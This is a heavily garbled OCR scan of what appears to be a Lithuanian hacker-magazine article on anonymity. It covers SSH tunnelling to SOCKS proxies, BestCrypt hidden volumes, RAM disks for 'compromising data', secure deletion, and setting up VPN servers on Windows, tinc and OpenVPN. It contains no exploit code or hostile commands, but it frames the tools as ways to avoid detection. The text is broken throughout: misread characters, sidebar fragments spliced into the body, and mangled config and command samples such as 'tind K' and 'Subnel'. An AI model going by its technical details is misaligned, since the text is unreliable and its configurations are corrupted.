Taigi paleisk Entunne! ir drąsiai spausk Create a new session. Connection 
skyrelyje aprašomi SSH susijungimo parametrai: SSH serverio IP adresas, 
jungtis (paprastai 22), taip pat autorizacijos tipas (pavyzdžiu slaptažo 
džiu). Visa tai užpildęs, pereik prie paties SSH tunelio parametrų, kune yra 
skyrelyje Port Forwarding. Spausk Add Ipridėti naują Jungčių peradresavi- 
mą), atsidariusiame lange įvesk taisyklės pavadinimą (tarkim, socks) bei 
lokalią mašinos jungtį, per kurią programa priiminės užklausas (socks atvėju 
protinga būtų nurodyti 1080). Toliau reikia įjungti opciją Destination Host is 
different from the SSH server ir tekstiniame lauke įvesti Iš anksto surasto 
socks serverio IP adresą bei jo jungtį. Tuo susijungimo kontigtiravimas balg- 
tas — galima jungtis. Tam tiesiog nuspausk Connect ir stebėk Status lauką. 
Jeigu viskas atlikta sėkmingai, programa dž 
Viskas. Dabar Entunne! priiminės į 1080 ateinančius prisijungimus, sukiš 
juos į SSH tunelį ir šifruotu pavidalu perduos serveriui, kuris, savo ruožtu, visą 
ŠĮ gėrį dekoduos Ir perduos į tikrą socks server. Kas lieka? Lieka priversti 
programas dirbti per lokalų socks serverį, t.y. visus prisijungimus nukreipti į 
lokalią 1080 jungtį. Jeigu programa gali dirbti per socks, tai problemos iš viso 
nėra, pakanka vietoje socks nurodyti 127.0.0.1:1080. O ką daryti su tomis 
programomis, kurios pagal nutylėjimą nemoka dirbti per pro? Čia labai 
pravers SocksCap (Www.socks.nec.com) arba FreeCap (WWw.freecap.1u) ti 
po programos-soksifikatoriai, Aš rekomenduočiau universalesnę priemonę 
Permeo Security Driver (Wwww.permeo.com), kuri ypatinga tuo, jog gali per 
socks praleisti viską net ir be išankstinio programų sukonfigūravimo (progra: 
ma veikia kaip tinklo tvarkyklė). 

Visus šiuos įrankius eksploatuoti labai paprasta, tačiau jeigu tau iškils klausi- 
mų, rekomenduočiau paskaityti šį straipsnį: www.xakep.ru/magazine/xa/063 
028/1.asp (rusų kalba). 

Apskritai SSH tuneliavimas turi daugybę kitų neginčijamų privalumų. Išoriškai 
tokie tuneliai nesukelia įtarimo ir atrodo kaip įprastinis darbas su terminalu, 0 
šifruotas VPN iš karto matomas visiems. Dar daugiau, visi VPN vartotojai 
tikriausiai yra susidūrę su tokia situacija, kai VPN susijungimas netikėtai ir 
nepastebimai nutrūksta, o darbas pratęsiamas be jo, tiesiogiai. Štai dėl tokio 
apgailėtino nesusipratimo galima lengvai išsiduoti rimtame reikale. Daryk 
išvadas. 


ai tau apie tai praneš. 


4 6. [Duomenų šifravimas] Visa privati informacija turi būti kruopš- 
čiai užšifruota Ir paslėpta nuo pašalinių asmenų su galingomis šifravimo 
sistemomis, tokiomis, kaip DriveCrypt (www.drivecrypt.com), PGP Whole 
Disk Encryption (wwi:pgp.com) Ir BestCrypt (w.jetico.com). Jeigu 
nor maksimalaus našumo Ir minimalaus vargo, drąsiai įdiek pastarąjį 
variantą — dabar mes išsamiai aptarsime būtent šią programą 
Įdiegimo metu neturėtų iškilti jokių sunkumų, ir vedlys turėtų labai greitai 
paprašyti perkrauti kompiuterį. Vas tik sistema vel užsikraus, sisteminia- 
me lauke Isystam tray) tu iš karto pamatysi naują ikonėlę. Čia nėra ko 

tis, tiesiog nuspausk ja ir iš meniu pasirink BestCrypt Control Panel. 


Atsidaręs langas — tai programos valdymo skydelis, su kuriuo mums 
reikės šiek tiek padirbėti. Čia reiktų dviem žodžiais papasakoti apie Be: 


stCypt galimybes. Panaudojus specialius algoritmus, programa sukuria 
specialią bylą-konteinerį, kurią prie sistemos galima primontuoti kaip 
įprestinį loginį diską. Funkciniu požiūriu šis diskas bus toks pat, kaip ir visi 
Kiti, tačiau tuo pat metu jame saugomi duomenys bus „veikimo metu 

šifruojami vienu iš pasirinktų kriptografinių algoriimų (AES, GOST 28147 

89, Twofish, 
prie sistemos galima tik įvedus slaptažodį. Priešingu atveju tai bus tik 
atstiktinių simbolių rinkinys, kuriuos dešifruoti vargu ar pajėgtų net ir sp 
cialosios tarnybos. 

P 


Blowfish). Čia esmė tame, jog tokį konteinerį primontuoti 


Jėsime kurti konteinerį. Iš pradžių reikia nurodyti diską, kuriame jis bus || 
saugomas, ir kontekstiniame meniu pasirinkti New container. Atsidariusia- || 
me lange bus keletas nustatymų: Filename (bylos-konteinerio pavadini 
mas), Location (jo saugojimo vieta), Size dydis). Algorithm (šifravimo algo. 
ritmas), Key generator (rakto sukūrimo algoritmas). Šifravimo Ir rakto sukū- 

mo algoritmų pasirinkimas visiškai Individualus dalykas. Jeigu tu mer 
Kai supranti, ką gali kiekvienas Iš jų, tiesiog, palik nustatymus pagal nutylė- 


Imą r spausk mygtuką Create. Toliau programa imsis Kurti pseudoatsitiktinę 


simbolių kombinaciją, reikalingą Informacijai koduoti, o tu šiame reikale turi 


Jai padėti (gal geriau šio proceso išsamiai neaprašinėkime :)). 
Taigi, be jokios abejonės, tokiu konteineriu galima pasitikėti, tačiau tai dar 
ne viskas. Atidarius programos valdymo skydelį, pašeliniai gali lengvai 
ti apie konteinerio egzistavimą, po Ko jie gali pabandyti parinkti 
arba net išgauti jo primontavimui reikalingą slaptažodį. Dėl šios priežas- 
ties konteinerio viduje rekomenduojama sukurti taip vadinamą paslėptą 
sritį, | kurią tu gali sudėti pačią svarbiausią informaciją ir tuo pačiu būti 
visiškai tikras dėl jos saugumo. Net jeigu kas nors ir sužinos tavo šifruoto 
disko slaptažodį, Jis tikrai neras paslėptoje srityje saugomų duomenų 

Sukurti paslėptą sritį nesudėtinga, tačiau čia reikia Įvertinti keletą niuansų. 


Jeigu tu jau primontavai šifruotą particiją, ją reikia atjungti (funkcija Dis- 
mount All BestCrypt Drives). Priešingu atveju tu tiesiog negalėsi įeiti į kontei: 

neno savybių langą (Change container properties), kur Ir atliekami visi 
ni veiksmai. Šiame lange mus domina tik viena opcija — Create 
Hidden Part. Drąsiai ją aktyvuok ir spausk OK pasirodys naujas langas su 
perspėjmu apie galimas paslėptos srities sukūrimo pasekmes. Viso šio Ilgo 
teksto gali ir neskaityti — tiesiog sutk. Toliau tereikia nurodyti paslėptos 
srities dydį bei slaptažodį, p0 ko galima pradėti jos formatavimą. 

Dabar apie tai, kaip ši sistema veikia, Jeigu tau reikia primontuoti įprastinį 
ruotą konteinerį [jo pavadinimas atvaizduojamas BestCrypt valdymo sky 

delije), įvesk savo pirmąjį slaptažodį, o Jeigu tau reikalinga paslėpta sntis 
(apie Jos egzistavimą žinai tu Ir tik tu!) — įvesk antrąjį. Yra Ir dar vienas 
svarbus niuansas: dirbti su pradiniame konteineryje saugomomis bylomis: 
galma išskirtinai iki (!) paslėptos srities sukūrimo. Vos tik tu ją sukursi, bet 
koks pradiniame konteineryje saugomų duomenų kopijavimas/pašalini- 
mas!perkėlimas gall sukelti paslėptoje srityje saugomos informacijos prara- 
dimą. Taip yra dėl to, jog net pats BestCrypt neįtaria apie paslėptos srities 
egystavimą ir buvimą konteinerio viduje iki tol, kal vartotojas neves atitin- 
kamo slaptažodžio. Taip išeina, kad pradiniame konteineryje saugomu bylų 
reikia tik maskavimuisi Ir jos paprastai nėra vertingos. 


reik 


ši 


LT 


7. [„RAM disk“ — ypatingiems atvejams 
skirta priemonė“|palingais atvėjais vietoje duome 
nų šiiravimo galima panaudoti egzotišką duomenų pa 
slėpimo variantą — RAM diską. Yra nemažai Usk Li- 
nux, tiek ir Windows sistemoms skirtų programų, kurios 
Ieidžia sukurti virtualų lokalų diską, kuno duomenys 
fiziškai bus saugomi operatyvinėje atmintyje. Kūrėjų 
žodžiais tariant, svarbiausias tokių programų tikslas 

daugkartinis skaitymo/įrašymo greičio padidinimas. Tai 
visai suprantama: bet kuri, net ir pati lėčiai 


a opera 
tyvinė atmintis veikia kur kas greičiau už patį greičiau 
sią SCSI diską. Beje, toks optimizavimas mus menka 
domina: kur kas patrauklesnė kita tokių diskų ypaty- 
bė. Esmė tame, kad iš karto po kompiuterio perkrovi- 
mo visi operatyvinėje atmintyje saugomi duomenys 
dingsta ir jų atstatyti be specialios įrangos praktiška 
neįmanome. Oir kas sužinos apie jų egzistavimą? Ma 
no manymu, tai galima gana sėkmingai panaudoti! 

Operatyvinė atmintis - tai ideali vieta laikinam ypatin 
gai kompromituojančių duomenų saugojimui. Vos Ik 


kas iš karto persikrauni, ir iš tokių duomenų nieko 
nelieka. Sukuni tokį diską galima labai lengvai, ypač 
jeigu po ranka yra programa RAMDIskXP (Ww 


ena 


tek.com).. Tereikia nurodyti RAM disko dydį, Ly 


skiriamos operatyvinės atminties Kekį. ir nuspausti 
mygtuka Start RAMDIsk. Sistemoje tuojau pat atsiras 
naujas loginis diskas. 

Be abejo, Šis įranks turi dar keletą nustatymų, tači 
mus jie menkai domina. Paminėsiu vienintelį dal 
jog visi tokio disko duomenys gali būti akimirksniu nu- 
kopijuoti į specialią bylą-atvaizdą (*.IMG), 0 sistemos 
paleidimo metu užkrauti į RAM diską. 


T 


8. [Saugus duomenų pašalinimas] Šimtaj 
kartą neaiškinsiu, jog norint visiškai sunaikinti duome- 
nis, paprasčiausiai juos ištrinti nepakanka. Tokiu atve- 
ju jų atstatymas ilgai netruks. Žymiai apsunkinti šią 
užduotį arba net minimizuoti tokią galimybę gali padėti 
specialios programos. Geriausia šioje srityje yra Acro- 
nis Privacy Expert. Iš esmės tai yra galingas įrankių 
kompleksas, vienas iš kurių užtikrina patikimą duome 
nų pašalinimą iš kompiuterio remiantis griežtais stan- 
dartais (apie saugų duomenų pašalinimą Ir apie jį ap- 
rašančius standartus buvo rašyta mūsų žumalo šių 
metų sausio mėnesio numenyje, straipsnyje „Shred- 
ders, Wipers, Cleaners ė: Erasers*). 
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Slaptas kanalas 


TU IEŠKAI PLATFORMOS, KURIOJE GALĖ- 
TUM PALEISTI NUOSAVĄ VPN SERVERĮ? IR 
TU MANAI, KAD LANGINĖS — TAI NE PATS 
TINKAMIAUSIAS VARIANTAS? KLYSTI! IS- 
DUOSIU TAU VIENĄ DIDELĘ PASLAPTĮ: SU 
SIA UZDUOTIMI „WINDOWS“ SUSITVARKO 
NE BLOGIAU NEI „LINUX“ IR „FREEBSD“. 


„VPN/OpenVPN“ 

paleidimas „Windows“ sistemoje 
[Standartinės priemonės] Šios užduoties sprendimui 
naudoti windozę patogiau bent jau todėl, kad visos rei- 
kiamos priemonės joje jau yra pagal nutylėjimą. Tai reiš- 
kia, jog tau nereikės iš interneto siųstis jokių papildo- 
mų programų ir jų įdieginėti. Tiek serverinės, tiek ir klien- 
tinės dalies konfigūravimui pakanka naudoti standarti- 
nius sistemos komponentus. Visas konfigūravimo pro- 
cesas tradiciškai atliekamas GUI aplinkoje, o tai taip 
pat negali nedžiuginti. Tu dar turėsi galimybę kaip rei- 
kiant pasikapstyti tekstiniuose OpenVPN konfiguose (apie 
ji mes kalbėsime kiek vėliau), todėl tikriausiai įvertinsi 
Windows kūrėjų rūpestingumą :). 

Galbūt aš tave nustebinsiu, bet visi aukščiau išsakyti 
teiginiai pasakytini ne tik apie serverines Windows ver- 
sijas (Windows 2000/2003 Server). Neįtikėtina, bet VPN 
serverį galima paleisti net ir Windows XP Professional 
sistemoje. Visas procesas vargu ar truks ilgiau nei 2 
minutes :). Patikrink tai pats: 

4. Visų pirma pereik į Control Panel —> Network Con- 
nections —> Create a new connection. 

2. Naujų susijungimų kūrimo vedlys tau turėtų būti ge- 
rai pažįstamas. Čia niekur akivaizdžiai nėra minimas VPN 
susijungimo konfigūravimas, tačiau yra pasirinkimas „Set 
up an advanced connection“. Būtent jį ir pasirink. 

3. Kitame etape iš dviejų pasiūlytų variantų pasirink op- 
ciją „Accept incoming connections“. Tai logiška, kadan- 
g mes konfigūruojame serverį. 

4. Toliau vedlys pasiūlys nurodyti tuos įrenginius, per 
kuriuos planuojama priimti įeinančius prisijungimus. Są- 
raše bus pateikti sistemoje įdiegti modemai, Bluetooth 
adapteriai ir kiti panašūs įrenginiai. Tačiau jie mus da- 
bar menkai domina, todėl nuimk visas vedlio uždėtas 
varneles ir spausk „Next“. 

5. Galų gale! Vedlys susivokia, jog mus galbūt domina 
VPN konfigūravimas, todėl užduoda atitinkamą klausi- 
mą. Drąsiai pasirink „Allow virtual private connections“. 
6. Kitas žingsnis — vartotojų autorizacijos parametrai. 
Savaime suprantama, prisijungti prie VPN serverio gali 
ne kiekvienas. Norėdamas užmegzti susijungimą, klien- 


SOFTWARE 


IMPLANT 


HACK 


SCENA 


CODING UNIXOID 


UNITS 


tas privaloma tvarka turi pra- 
eiti autorizacijos procedūrą. 
Tiesą sakant, dabar vedlys siū- 
lo pasirinkti tuos vartotojus, 


vanesa, GonVTERM! 
VPN.hum— kas taiyra VPN? 
Ww xakep.tU Magazine xa) 


0690681.a5> Išsamiai 
aple VPN technologiją tusų | kuriems leidžiama įeiti į virtu- 
Anaumtiistypiamų AU privatų tinklą. Galima iš- 
Ioapiomi geras straipsnis Sirinkti lokalius vartotojus ar- 
apie RSA algoritmus. ba pridėti naujus. Pastaruoju 


lekkutu nyesisavrankėkai AUVejJU spausk mygtuką 
sukampiliuoti une arba „Add...“ — vedlys iš karto pa- 
S ais IS S reikalaus įvesti naujojo varto- 

Kadtedrenn ta tojo vardą ir slaptažodį. 
GW (wwm.mini or) Vado 7, Tinklo protokolų ir ypač 
p Žadija sia asas TCP/IP konfigūracija ne mažiau 
Aramomis. svarbi. Protokolų sąraše išsi- 
rink atitinkamą punktą ir nu- 
spausk mygtuką „Properties“. Tam, kad vartotojai galėtų gauti 
priėjimą prie tavo lokalaus tinklo, būtina aktyvuoti TCP/IP opciją 
Allow callers to access my local area network. Toliau reikia api- 
brėžti IP adresų diapazoną, iš kurio adresai bus priskiriami pri- 
sijungusiems klientams. Taip pat galimas ir toks variantas, jog 


vartotojui IP adresas bus išduodamas automati: 
servisi 
8. Viskas, tuo konfigūravimas baigtas. Gali ko nors iš draugų 
paprašyti prisijungti prie tavo šviežiai iškepto serverio. Klientinio 
prisijungimo konfigūravimas mažai kuo skiriasi nuo Dial-up pri- 
sijungimo sukūrimo, todėl mes čia jo neaptarsime tai per 
daug paprasta 


Kai su DHCP 


[0 kaip su „Windows Server“?] VPN konfigūracija Windows 
XP sistemoje apipjaustyta iki negalėjimo. Iš vienos pusės, tai 
gerai, nes taip VPN sukonfigūruoti gali net ir naujokai, tačiau ką 
daryti mums, patyrusiems guru? :) Atsakymas į šį klausimą taip 
pat paprastas, kaip ir akivaizdus: vietoje pagarsėjusios XP. kuri 
vargu ar tinka tokiems eksperimentams, naudotis galinga Win 
dows Server 2003 sistema. Sukonfigūruoti serverinę OS šiek 
tiek sudėtingiau, bet šis išsamus aprašymas Įeis tau išvengti 
papildomų klausimų: 

1. Iš pradžių per Start meniu atidaryk Administration Tools ir 
Routing and Remote Access. 

2. Valdymo konsolėje pasirink lokalų serverį ir atidžiai pažiūrėk 
į apatinę kairę lango dalį. Jeigu pamatysi raudoną indikatorių, 


User Permissions 
You can specfy the Users iha can comeci to his computer 


Select the check bax next to each user ihc should be alowed a comecton to this 
šomputer. Note Ihat other factors, such as a disabled User account, may alfeci a Users 


abily to connect 
Users alowedio conneci 

D1447 ASPNET ASP NET Machine Account) 

D4 bob 

Džiūes: 

D] HeipAssistant (Remote Desktop Helo Asustart Account) 

Ožio - 
< 


Eropertiės 


CEU JL) 


| autorizuotų vartotojų gretas galima įtraukti kai kuriuos jau ogzistuojanė 


vartotojus. Nuspaudus mygtuką „Add...“. sistemoje galima aprašyti ir naujus vartotojus 


reiškia mums reikalingas servisas nepajungtas. Gerai būtų tai 
ištaisyti: tam ant serverio pavadinimo nuspausk dešinį pelės 
klavišą ir pasirink Configure and Enable Routing and Remote 
Access. 

3. Toliau spragtelėk ikona Remote access (dial-up or VPN), kur 
specialus vedlys tavęs paklaus, kokius prisijungimus galima pri 
imti. Dabar mus domina išskirtinai VPN jį ir reikia pažymėti. 
4. Pasirodęs VPN connection langas siūlo nurodyti tam tikrus 
būsimų prisijungimų parametrus. Pasirink tą prisijungimą, kuris 
yra nukreiptas į tavo lokalųjį tinklą arba internetą (priklausomai 
nuo planuojamos struktūros ir VPN susijungimo paskirties), o 
tada nuspausk mygtuką Next 

5. IP Address Assignment lange vedlys pasiūlys nurodyti IP adre- 
sų nustatymus, kurie bus priskiriami besijungiantiems klientams. 
Jeigu mašinoje įdiegtas DHCP serveris (kas visai tikėtina), pasi- 
rink punktą Automaticaly ir spausk Next. Jeigu nori nurodyti ran 
kiniu būdu išduodamų IP adresų diapazoną, Įvesk tave domi 
nančias reikšmes Start IP address ir End IP address laukuose. 
Pasistenk, kad šie IP adresai būtų iš to paties potinklio, kuria- 
me yra ir tavo kompiuteris. Priešingu atveju tau teks aprašinėti 


[VPN realizacijos trūkumai „Windows“ sistemoje] 
Nepaisant konfigūravimo paprastumo, VPN realizacija Win- 
dows sistemoje turi tam tikrų trūkumų. Tu uprasi, ką 
vilgtelėsime | VPN susijungimo 
as inicijuoja VPN susijungimą, tarp 
kurį pradeda- 


vidurius. Po to, k: 
serverio sukuriama 


srautas šifruotu pavidalu. Tinklo srautas enkapsuliuojamas 
su GRE (Generic Routing Encapsulation) protokolu, kuris iš 


esmės yra silpnoji sistemos grandis. Čia problema tame, jog 

kai kurie interneto paslaugos tiekėjai nepraleidžia GRE pake- 

tų ir tuo pačiu pilkai blokuoja VPN naudojimą. Apeiti šio ap- 

ribojimo neįmanoma, todėl tenka griebtis alternatyvių VPN 

realizacijų, kurios naudoja nuosavą tinklo srauto enkapsulia- 
iemą 
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Incoming Virtual Private Network (VPN) Connection 
Another computer can connect to ycurs through a VPN connectior 


Vaipaniacaroekaaio Ja cannes o tona pati ni 
your computer has a known name or IP address or ihe Irtemet 


you slow VPN comnectiona, Windows wil modify the Intemet Connection Frewal io 
low your compuler to send and receive VPN packels. 
Do you wat to aliow vituai private connections to Ihis Compuier? 

(Olow vaiual pavate conneciions) 

(Do nat alow vrtuai private connections 


Svarbiausias dalykas: Ieidžiame virtualius privačius tinklus 


papildomas maršrutizavimo taisykles, kad visi klientai būtų pri- 
einami. 

6. Kitame etape rekomenduoju tau palikti pagal nutylėjimą pa- 
sirinktą parametrą No, use Routing and Remote Access to aut- 
henticate connection reguests. Paskutinį kartą spausk mygtuką 
Next, tada Finish, — tuo išankstinis pasiruošimas baigtas. 

Iš esmės VPN serveris jau paruoštas darbui, tačiau prisijungimai 
prie jo kol kas dar draudžiami. Leisti nuotolinius prisijungimus vėl 
padės „Routing and Remote Access“ sisteminis apletas: 

1. Išskleisk savo serverio objektą ir pasirink „Remote Access 
Policies“. 

2. Dabar sąraše ant ikonos Connections to Microsoft Routing 
and Remote Access server paspausk dešinį pelės klavišą ir pa- 
sirink Properties. 

3. Mes pasiekėme mus dominančią opciją — Grant remote 
access permission. Aktyvuok ją Ir nuspausk „Ok“. Konfigūravi- 
mas baigtas. 

Dabar VPN serveris gali priimti įeinančius prisijungimus, tačiau 
kol kas neaišku, kokius ir iš kur. Liko smulkmena — nurodyti 
sistemai autorizuotus jungtis prie šio VPN serverio vartotojus, 


L) Be don Yen Window Espo 


* J Svedūuenes 

* B antoso com 

* JIBAn 
Iš Conpužers 


ŠiuR cantos User 
Windows Server 2003 vartotojai valdomi per katalogų tarnybą (Active Directory) 


kas daroma per katalogų tarnybą (Active Directory). Jeigu ji tavo 
serveryje nėra įdiegta arba nesukonfigūruota, galiu tave tik už- 
jausti ir pasiūlyti perskaityti mūsų žurnalo praėjusių metų spalio 
mėnesio numeryje (I[-29) pateiktą straipsnį „Pabalnok Windows 
Server 2003“. Jeigu vis dėlto su AD viskas gerai, tuomet veiks- 
mų tvarka būtų tokia: 

1. Pasirink Start -> Administrative Tools -> Active Directory 
Users and Computers 

2. Dabar sukurk naują arba surask tave dominančio vartotojo 
sisteminį įrašą ir atidaryk jo savybes. 

3. „Dial-in“ skyrelyje yra pasirinkimas Allow access. Jį reikia 
aktyvuoti. 

Sistemoje dar yra daug svarbių su VPN susijungimais susijusių 
nustatymų. Visų jų reikia tam, kad administratorius galėtų iki 
menkiausių smulkmenų sukonfigūruoti virtualų privatų tinklą ir 
padaryti jį tokį, kokiu jis jį norėtų matyti. Pirmyn! 


[Kas tai yra „tinc“?] Other VPN solutions (www.tinc-vpn.org/ 
vpnlinks) sąraše galima rasti beveik 15 panašiu realizacijų. Ypa- 
tingą pagarbą ir didžiausią populiarumą pelnė dvi iš jų: tinc 
(ww.tinc-vpn.org) ir OpenVPN (www.openvpn.net). Apie jas mes 
šiandien ir pakalbėsim. 

Kai žiūri į juokingą tinc distributyvo dydį (viso labo 697 Kb), tai 
net negali įsivaizduoti, jog jo kūrėjai įsigudrino jame sutalpinti 
pilnavertišką VPN susijungimų paleidimo priemonę. Programa 
palaiko visus virtualiems privatiems tinklams būdingus bei rei- 
kalingus atributus ir dar daugiau! Spręsk pats: tinklo srauto tu- 
neliavimas, nepertraukiamas perduodamų duomenų šifravimas 
ir net spaudimas „veikimo metu“. Pastebėtina. jog tinc galimy- 
bės neapsiriboja taškas-taškas tipo susijungimais. Virtualus tin- 
klas gali būti sudarytas iš kelių klientų ir, kas ypatingai malonu, 
tinc savarankiškai spręs visas su maršrutizavimu susijusias Už- 
duotis. Būk tikras: duomenys VPN tinklo viduje visada keliaus 
optimaliausiu keliu ir, jeigu tai įmanoma, tiesiai į paskirties taš- 
ką. Manau, jog net šito pakanka norint tave suintriguoti, todėl 
siūlau pereiti prie praktinės dalies. 


[Konfigūruojame „tinc“ demoną] |ciegti tine „Linux“ sistemo- 
je nėra sudėtinga. Sukonfigūruoti jo veikimą Windows sistemo- 
je — dar paprasčiau. Kalbant apie Windows sistemas, tai visi 
reikiami pasiruošimai apsiriboja virtualaus tinklo įrenginio tvar- 
kyklių įdiegimu. Tinc naudoja TAP-Win32 tvarkyklę, kuri pagal 
nutylėjimą įtraukta į programos distributyvą, tačiau esant būti- 
nybei ji gali būti parsiųsta iš OpenVPN svetainės 
(www.openvpn.net). Pabaigęs programos diegimą, pereik į ka- 
talogą C:|Program Filesltinc|tap-win32. Čia yra byla addtap.bat. 
Paleisk ją, ir meniu Start -> Network Connections atsiras nau- 
jas tinklo susijungimas, kurį aš iš karto siūlau pavadinti VPN. 
Prie jo konfigūravimo mes grįšime šiek tiek vėliau. 

Demonas turi viso labo vieną vykdomą bylą — tincd.exe. Kai 
kam tai gali pasirodyti keista: juk turėtų būti tiek serverinė, tiek 
ir klientinė dalis. Tai paaiškinama labai paprastai: tinc elgesys 
visiškai priklauso nuo tų nustatymų, kurie nurodyti jo konfigūra- 
cinėse bylose. Po paleidimo tinc demonas nuskaito komandinę 
eilutę ir konfigūracinę bylą tinc.conf. Jeigu konfige yra bent vie- 
nas ConnectTo parametras, programa automatiškai pradeda at- 
likinėti kliento funkcijas, bando prisijungti prie mazgų, kuriuos ir 
nurodo šis parametras. Tuo metu nepriklausomai nuo to, ar 
buvo nurodytas ConnectTo parametras, ar ne, tinc toliau stebi 


įeinančius kitų demonų prisijungimus. Taip išeina, kad tinc'e 
nėra skirtumo tarp kliento ir serverio. Vis dėlto viena pusė būti- 
nai turi būti klientu, kad inicijuotų prisijungimą. 

Kad neapkraučiau tavęs nuobodžia teorija, siūlau realiai paro- 
dyti įrankio galimybes, sukuriant VPN susijungimą tarp dviejų 
otinklių. Pirmojo potinklio parametrai: 192.168.0.1/24, po- 
tinklio kaukė — 255.255.255.0. Antrojo potinklio parametrai: 
192.168.0.2/24, potinklio kaukė 255.255.255.0. Tinc de- 
moną reikia įdiegti kiekviename šių potinklių ir tik po to pradėti 
ungimo konfigūravimą. 

paprasčiausiu atveju tinc.conf konfigūracinė byla atrodo 
tai taip: 


Parametras Name parodo VPN susijungimo mazgo pavadi- 
imą. Jis visiškai neprivalo sutapti su kompiuterio pavadini- 
nu arba dar kuo nors, tačiau turi būti unikalus. Taigi jeigu 
pirmojo kompiuterio pavadinimas yra office, tai antrasis ati- 
nkamai vadinsis home. Su antruoju parametru — Interfa- 
e — pasirenkamas susijungimas, kuris bus naudojamas 
PN kanalui sukurti. Paprasčiau šnekant, reikia nurodyti tą 
įjungimo pavadinima, kuris naudoja virtualų tinklo įren- 
ginį (TAP-Win32). Jeigu tu paklausei mano patarimo ir per- 
vadinai jį VPN, tai šio parametro reikšmė turėtų būti kaip ir 
pas mane pavyzdyje. Apie ConnectTo parametrą aš jau pa- 
sakojau: Jis nurodo VPN mazgo pavadinimą, prie kurio bus 
jungiamasi. Nesunku numanyti, kaip atrodys kito VPN maz- 
konfigas: 


ne home 
VPI 


Čanne alice 


Šiuo atveju abu mazgai inicijuoja abipusį prisijungimą — tai 
nera draudžiama. Sugrįžkime prie name parametro: jo reikš- 
mės home ir office yra simboliniai vardai, kurie apibrėžia VPN 
Klientų pavadinimus, tačiau patys savaime nieko nereiškia. Kon- 
krečiam mazgų aprašymui naudojamas antrasis konfigūracinių 
tipas, šios bylos saugomos kataloge C:|Program Fi 
nelhosts. Pavyzdžiui, home VPN mazgą aprašantis konfi- 
yra čia: C:IProgram Filesltinc|hosts|home. Office paramet- 
fai apibrėžti byloje |hostsloffice ir t.t. Pagal nutylėjimą tokių by- 
Ių nėra, todėl jas reikia kurti savarankiškai. Jeigu tikėsime do- 


Raktai sėkmingai sugeneruoti 


kumentacija, tai jose galima aprašyti pakankamai daug VPN 
mazgo parametrų, tačiau mūsų atveju pakaks tik vieno iš jų 
subnet. 


home byla: 
Subnel — 192.168.0.1/24 
ollice bylo: 
Subnet = 192.168-1.1/24 


Visi likusieji parametrai Windows atveju neaktualūs, kadangi nu- 
rodomi su virtualiu tinklo susijungimu, kuriuo mes dabar ir užsi 
imsime. Atidaryk Network Connections ir iš karto pereik į virtu- 
alaus adapterio TCP/IP savybes. Čia svarbiausia — kiekviena- 
me kompiuteryje nurodyti potinklio kaukę 255.255.0.0. IP 
adreso pasirinkimas šiuo atveju neturi įtakos, tiesiog pasirink 
juos iš atitinkamų potinklių (home atveju 192.168.0.*, 0 
office atveju — 192.168.1.*) 
Atrodytų, jau viskas — galima visose mašinose paleisti tinc ir 
pradėti dirbti. Bet ne! Pilnavertiškam VPN darbui ir tinklo srauto 
šifravimui reikia dviejų raktų: viešo ir privataus. Tokius raktus 
galima sugeneruoti su komanda: 


tind K 


Tincd sukurs du 1024 bitų raktus ir paklaus, kur juos išsaugoti 
Programai taip pat bus pasiūlyti keliai pagal nutylėjimą, su kuo 
galima visiškai sutikti. Tam pakanka du kartus nuspausti klavišą 
<Enter>. Finale mes turėsim dvi bylas: rsa key.pub ir 
rsa key.priv. Privatus raktas (rsa key.priv) lieka serverinėje ma- 
šinoje, o viešas (rsa key.pub) išplatinamas visiems patikėtiems 
asmenims, t.y. klientams (klientai identifikuojami pagal atvirą 
raktą). Taigi susijungimo parametrai apibrėžti, raktai išsiųsti 
galima aktyvuoti susijungimą. Tam abiejose mašinose paleisk 
tincd.exe demoną ir lauk, kol mašinos viena su kita susijungs. 
Tai ilgai netruks ir greitai tu galėsi mėgautis rezultatu :). Beje, 
po pirmojo paleidimo tinc automatiškai save Įrašys į servisus Ir 
automatiškai pasileidinės startuojant Windows. 


ĮPažintis su „OpenVPN“] Be jokios abejonės, tinc tai pui- 
ki, bet kol kas ganėtinai egzotiška VPN realizacija. Kur kas la- 
biau paplitusi OpenVPN sistema. Tu tikriausiai esi matęs jos 
pavadinimą internete arba mūsų žurnalo puslapiuose — tai ge 
riausias mano žodžių įrodymas. Derėtų pasakyti, jog tokį popu- 
liarumą šis įrankis pelnė neatsitiktinai. Tai iš tiesų labai galinga 
ir patikima VPN SSL susijungimų realizacija. OpenVPN turi du 
apsaugos režimus. Pirmasis pagrįstas SSL/TLS technologijomis 
su sertifikatų ir raktų panaudojimu. Antrasis — statinių raktų 
panaudojimu. Aš aptarsiu antrąjį variantą, kadangi jis yra pa- 
prasčiausias. Tačiau jokiu būdu nederėtų iš karto atmesti pir- 
mojo varianto su SSL sertifikatais, kadangi Jis yra saugesnis. 
Tiesiog paliksime jį perprasti savarankiškai. Kaip pavyzdį mes 
paimsime gana paprastą užduotį. Aš siūlau aptarti atvejį, kuo- 
met šifruotą ryšio kanalą reikia užmegzti tarp dviejų internete 
esančių tinklo mazgų arba lokalaus tinklo. Reikėtų paminėti, 
jog tai dažniausiai pasitaikanti situacija. 


[Demono įdiegimas] Tarkim, pradėsime nuo programos įdiegi- 
mo proceso, kuris visiškai identiškas tiek serverinei, tiek ir klien- 
tinei pusei. OpenVPN distributywas platinamas kaip paprasčiau- 
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sia wykdoma byla, todėl vienintelis dalykas, kurį tu turi padaryti 

ją paleisti ir sekti vedlio instrukcijas. Tolimesnio programos kon- 
figūravimo patogumo dėlei, ją geriau įdiegti ne į pagal nutylėji- 
mą įdiegėjo siūlomą katalogą, o į c:|OpenVPN. Nebijok, jeigu 
įdiegimo metu pasirodys apie naujos įrangos įdiegimą prane- 
šantis langas. Esmė tame, kad OpenVPN į sistemą įdiegs virtu- 
alaus tinklo adapterio tvarkyklę TAP-Win32 Adapter V8. Tai to- 
kia pat tvarkyklė, kuri buvo naudojama tinc atveju. 

Pasibaigus programos įdiegimui, pereik į Network connections ir ten 
surask ką tik sukurtą susijungimą. Tau į akis iš karto kris užrašas 
Network cable unplugged. Mus domins TCP/IP protokolo nustaty- 
mai, kuriuose reikia nurodyti unikalų mūsų virtualaus tinklo potinklį 
bei potinklio kaukę. Tegu tai bus 10.3.0.1/24 potinklis, o potinklio 
kaukė — 255.255.255.0. Atitinkamai vienoje iš mašinų vietoje IP 
adreso mes nurodysime 10.3.0.1, o kitoje — 10.3.0.2 (čia IP ad- 
resai pasirinkti laisvai, svarbiausia — kad jie patektų į mūsų pasi 
